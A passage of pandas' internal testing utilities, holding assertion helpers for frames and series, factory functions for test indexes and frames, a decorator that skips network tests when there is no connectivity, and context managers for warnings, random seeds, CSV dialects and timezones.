>>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
>>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
df1 equals itself.
>>> assert_frame_equal(df1, df1)
df1 differs from df2 as column 'b' is of a different type.
>>> assert_frame_equal(df1, df2)
Traceback (most recent call last):
...
AssertionError: Attributes of DataFrame.iloc[:, 1] (column name="b") are different
Attribute "dtype" are different
[left]: int64
[right]: float64
Ignore differing dtypes in columns with check_dtype.
>>> assert_frame_equal(df1, df2, check_dtype=False)
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, DataFrame)
if check_frame_type:
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# shape comparison
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shape mismatch", f"{repr(left.shape)}", f"{repr(right.shape)}"
)
if check_like:
left, right = left.reindex_like(right), right
if check_flags:
assert left.flags == right.flags, f"{repr(left.flags)} != {repr(right.flags)}"
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
# column comparison
assert_index_equal(
left.columns,
right.columns,
exact=check_column_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
rtol=rtol,
atol=atol,
obj=f"{obj}.columns",
)
# compare by blocks
if by_blocks:
rblocks = right._to_dict_of_blocks()
lblocks = left._to_dict_of_blocks()
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(
lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.iloc[:, i]
rcol = right.iloc[:, i]
assert_series_equal(
lcol,
rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_exact=check_exact,
check_names=check_names,
check_datetimelike_compat=check_datetimelike_compat,
check_categorical=check_categorical,
check_freq=check_freq,
obj=f'{obj}.iloc[:, {i}] (column name="{col}")',
rtol=rtol,
atol=atol,
)
def assert_equal(left, right, **kwargs):
"""
Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.
Parameters
----------
left, right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
The two items to be compared.
**kwargs
All keyword arguments are passed through to the underlying assert method.
"""
__tracebackhide__ = True
if isinstance(left, pd.Index):
assert_index_equal(left, right, **kwargs)
if isinstance(left, (pd.DatetimeIndex, pd.TimedeltaIndex)):
assert left.freq == right.freq, (left.freq, right.freq)
elif isinstance(left, pd.Series):
assert_series_equal(left, right, **kwargs)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(left, right, **kwargs)
elif isinstance(left, IntervalArray):
assert_interval_array_equal(left, right, **kwargs)
elif isinstance(left, PeriodArray):
assert_period_array_equal(left, right, **kwargs)
elif isinstance(left, DatetimeArray):
assert_datetime_array_equal(left, right, **kwargs)
elif isinstance(left, TimedeltaArray):
assert_timedelta_array_equal(left, right, **kwargs)
elif isinstance(left, ExtensionArray):
assert_extension_array_equal(left, right, **kwargs)
elif isinstance(left, np.ndarray):
assert_numpy_array_equal(left, right, **kwargs)
elif isinstance(left, str):
assert kwargs == {}
assert left == right
else:
raise NotImplementedError(type(left))
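# Illustrative sketch (not part of the original module): assert_equal dispatches
# on the type of `left`, so the same call covers Series, Index, arrays and frames.
def _example_assert_equal_dispatch():
    """Illustrative usage sketch of assert_equal."""
    assert_equal(Series([1, 2]), Series([1, 2]))  # routed to assert_series_equal
    assert_equal(np.array([1, 2]), np.array([1, 2]))  # routed to assert_numpy_array_equal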
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.array:
expected = pd.array(expected)
elif box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
if transpose:
            # for vector operations, we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
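# Illustrative sketch (not part of the original module): wrapping the same
# expected values in different containers, as a parametrized test would.
def _example_box_expected():
    """Illustrative usage sketch of box_expected."""
    values = np.array([1, 2, 3])
    assert isinstance(box_expected(values, pd.Series), pd.Series)
    assert isinstance(box_expected(values, pd.Index), pd.Index)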
def to_array(obj):
# temporary implementation until we get pd.array in place
dtype = getattr(obj, "dtype", None)
if is_period_dtype(dtype):
return period_array(obj)
elif is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(dtype):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(left, right):
"""
Check that the left and right SparseArray are equal.
Parameters
----------
left : SparseArray
right : SparseArray
"""
_check_isinstance(left, right, pd.arrays.SparseArray)
assert_numpy_array_equal(left.sp_values, right.sp_values)
# SparseIndex comparison
assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
left_index = left.sp_index
right_index = right.sp_index
if not left_index.equals(right_index):
raise_assert_detail(
"SparseArray.index", "index are not equal", left_index, right_index
)
else:
        # indices are equal; nothing further to check
pass
assert_attr_equal("fill_value", left, right)
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(left.to_dense(), right.to_dense())
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, f"Did not contain item: {repr(k)}"
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements
comparable with assert_almost_equal
Checks that the elements are equal, but not
the same object. (Does not check that items
in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
msg = (
f"Expected object {repr(type(elem1))} and object {repr(type(elem2))} to be "
"different objects, but they were the same object."
)
assert elem1 is not elem2, msg
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k=10, name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
return dr
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
    seed : int, optional
        The random state seed.
    Returns
    -------
    DataFrame
        A DataFrame indexed by "timestamp" with the following columns:
        * name : object dtype with string names
        * id : int dtype with Poisson-distributed integer ids
        * x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = pd.DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
yield from make_index_funcs
def all_timeseries_index_generator(k=10):
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
    Create an index/multiindex with given dimensions, levels, names, etc.
    nentries - number of entries in index
    nlevels - number of levels (> 1 produces multiindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
    ndupe_l - (Optional), list of ints, the number of rows for which the
        label will be repeated at the corresponding level, you can specify just
        the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
    assert names is None or names is False or names is True or len(names) == nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = dict(
i=makeIntIndex,
f=makeFloatIndex,
s=makeStringIndex,
u=makeUnicodeIndex,
dt=makeDateIndex,
td=makeTimedeltaIndex,
p=makePeriodIndex,
).get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
cnt = Counter()
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
tuples.append(result)
tuples = list(zip(*tuples))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
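# Illustrative sketch (not part of the original module): build a two-level
# MultiIndex of 4 entries where each first-level label is repeated twice.
def _example_makeCustomIndex():
    idx = makeCustomIndex(nentries=4, nlevels=2, ndupe_l=[2])
    assert isinstance(idx, MultiIndex)
    assert idx.nlevels == 2 and len(idx) == 4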
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
    c_idx_names, r_idx_names - False/True/list of strings, yield no names,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
    r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
        If idx_type is not None, `idx_nlevels` must be 1.
        "i"/"f" creates an integer/float index,
        "s"/"u" creates a string/unicode index
        "dt" creates a datetime index.
        "td" creates a timedelta index.
if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
def optional_args(decorator):
"""
allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)
"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
args = []
return dec(f)
else:
return dec
return wrapper
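# Illustrative sketch (not part of the original module): optional_args lets the
# same decorator be applied bare or with keyword arguments.
def _example_optional_args():
    @optional_args
    def tag(f, label="default"):
        @wraps(f)
        def inner(*args, **kwargs):
            return label, f(*args, **kwargs)
        return inner
    @tag
    def one():
        return 1
    @tag(label="custom")
    def two():
        return 2
    assert one() == ("default", 1)
    assert two() == ("custom", 2)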
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
"timed out",
"Server Hangup",
"HTTP Error 503: Service Unavailable",
"502: Proxy Error",
"HTTP Error 502: internal error",
"HTTP Error 502",
"HTTP Error 503",
"HTTP Error 403",
"HTTP Error 400",
"Temporary failure in name resolution",
"Name or service not known",
"Connection refused",
"certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
"""
    Try to connect to the given url. Returns True if it succeeds, False if an
    IOError is raised.
Parameters
----------
url : basestring
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
if error_classes is None:
error_classes = _get_default_network_errors()
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(
t,
url="https://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=None,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
In comparison to ``network``, this assumes an added contract to your test:
you must assert that, under normal conditions, your test will ONLY fail if
it does not have network connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check
for connectivity. Defaults to 'https://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
        Any exception that has .errno or .reason.errno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to suppress errors where an errno isn't available.
Notes
-----
* ``raise_on_error`` supersedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
    Tests decorated with @network will only raise errors when it's possible to
    make a network connection to the check URL (defaults to google.com);
    otherwise network errors cause the test to be skipped::
>>> from pandas._testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
Traceback
...
    URLError: <urlopen error unknown url type: rabbit>
You can specify alternative URLs::
>>> @network("https://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
Errors not related to networking will always be raised.
"""
from pytest import skip
if error_classes is None:
error_classes = _get_default_network_errors()
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if check_before_test and not raise_on_error:
if not can_connect(url, error_classes):
skip()
try:
return t(*args, **kwargs)
except Exception as err:
errno = getattr(err, "errno", None)
            if not errno and hasattr(err, "reason"):  # e.g. URLError wraps errno in .reason
errno = getattr(err.reason, "errno", None)
if errno in skip_errnos:
skip(f"Skipping test due to known errno and error {err}")
e_str = str(err)
if any(m.lower() in e_str.lower() for m in _skip_on_messages):
skip(
f"Skipping test because exception message is known and error {err}"
)
if not isinstance(err, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
skip(f"Skipping test due to lack of connectivity and error {err}")
return wrapper
with_connectivity_check = network
@contextmanager
def assert_produces_warning(
expected_warning=Warning,
filter_level="always",
check_stacklevel=True,
raise_on_extra_warnings=True,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
The type of Exception raised. ``exception.Warning`` is the base
class for all warnings. To check that no warning is returned,
specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
check_stacklevel : bool, default True
If True, displays the line that called the function containing
        the warning to show where the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
    .. warning:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
saw_warning = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if expected_warning and issubclass(
actual_warning.category, expected_warning
):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[2][0])
msg = (
"Warning not set with correct stacklevel. "
f"File where warning is raised: {actual_warning.filename} != "
f"{caller.filename}. Warning message: {actual_warning.message}"
)
assert actual_warning.filename == caller.filename, msg
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
msg = (
f"Did not see expected warning of class "
f"{repr(expected_warning.__name__)}"
)
assert saw_warning, msg
if raise_on_extra_warnings and extra_warnings:
raise AssertionError(
f"Caused unexpected warning(s): {repr(extra_warnings)}"
)
class RNGContext:
"""
    Context manager to set the numpy random number generator seed. Returns
to the original value upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
"""
Context manager to temporarily register a CSV dialect for parsing CSV.
Parameters
----------
name : str
The name of the dialect.
kwargs : mapping
The parameters for the dialect.
Raises
------
ValueError : the name of the dialect conflicts with a builtin one.
See Also
--------
csv : Python's CSV library.
"""
import csv
_BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}
if name in _BUILTIN_DIALECTS:
raise ValueError("Cannot override builtin dialect.")
csv.register_dialect(name, **kwargs)
yield
csv.unregister_dialect(name)
@contextmanager
def use_numexpr(use, min_elements=None):
from pandas.core.computation import expressions as expr
if min_elements is None:
min_elements = expr._MIN_ELEMENTS
olduse = expr.USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
@contextmanager
def set_timezone(tz: str):
"""
Context manager for temporarily setting a timezone.
Parameters
----------
tz : str
A string representing a valid timezone.
Examples
--------
>>> from datetime import datetime
>>> from dateutil.tz import tzlocal
>>> tzlocal().tzname(datetime.now())
'IST'
>>> with set_timezone('US/Eastern'):
... tzlocal().tzname(datetime.now())
...
'EDT'
"""
import os
import time
def setTZ(tz):
if tz is None:
try:
del os.environ["TZ"]
except KeyError:
pass
else:
os.environ["TZ"] = tz
time.tzset()
orig_tz = os.environ.get("TZ")
setTZ(tz)
try:
yield
finally:
setTZ(orig_tz)
